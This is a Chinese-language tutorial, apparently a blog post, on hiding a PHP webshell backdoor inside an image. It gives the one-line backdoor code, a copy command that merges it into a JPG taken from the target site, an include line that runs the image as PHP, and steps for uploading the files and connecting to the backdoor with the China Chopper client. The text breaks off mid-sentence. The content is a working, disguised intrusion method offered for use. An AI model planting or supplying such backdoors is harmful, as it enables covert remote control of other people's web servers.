我们平时藏匿图片后门是什么流程呢?我们来看一下
0x01 初级的藏匿方法:
1、建立一个eval.php文件,上面加入我们的后门:
<?php assert($_POST[feiji]);?>
2、找一张图片1.jpg,最好是从目标网站上下载下来的图片。
3、合并图片和php后门:
Copy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\htdocs\images\eval.php C:\xampp\htdocs\images\2.jpg
4、在任何一个php文件中包含这个2.jpg的图片后门,这里以images.php为例,写入以下的代码:
<?php include (‘2.jpg’); ?>
5、上传2.jpg和images.php,在菜刀里添加一句话后门:http://127.0.0.1/images/images.php,密码为feiji。
访问图片正常:
访问i